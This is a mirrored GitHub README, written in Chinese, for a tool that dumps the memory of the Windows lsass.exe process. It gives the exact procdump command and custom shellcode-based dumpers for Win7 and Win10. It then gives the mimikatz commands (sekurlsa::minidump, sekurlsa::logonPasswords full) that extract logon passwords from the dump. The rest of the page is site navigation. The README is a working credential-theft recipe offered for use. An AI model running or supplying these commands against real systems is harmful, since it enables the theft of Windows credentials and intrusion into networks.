Coder Social home page Coder Social logo

dump_lsass's Introduction

dump_lsass

一个dumpWindows系统lsass.exe进程的工具

dump_lsass_for_Win7_x64.c和dump_lsass_for_Win10_x64.c是国外一位大佬写的lsass.exe进程dump工具,参考链接:https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/

procdump.exe是一个微软官方的进程转储工具,主要用于抓取崩溃进程的内存数据,下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

第1步:转储lsass.exe进程

使用prodump.exe转储(需要管理员权限)

procdump.exe -accepteula -ma lsass.exe lsass_dump

或者使用dump_lsass_for_Win*_x64.exe转储(需要管理员权限)

dump_lsass_for_Win7_x64.exe

dump_lsass_for_Win10_x64.exe

第2步:利用mimikatz读取密码,lsass_dump.dmp为保存dump数据的文件

mimikatz.exe "sekurlsa::minidump lsass_dump.dmp" "sekurlsa::logonPasswords full" exit

dump_lsass's People

Contributors

7hma3s avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.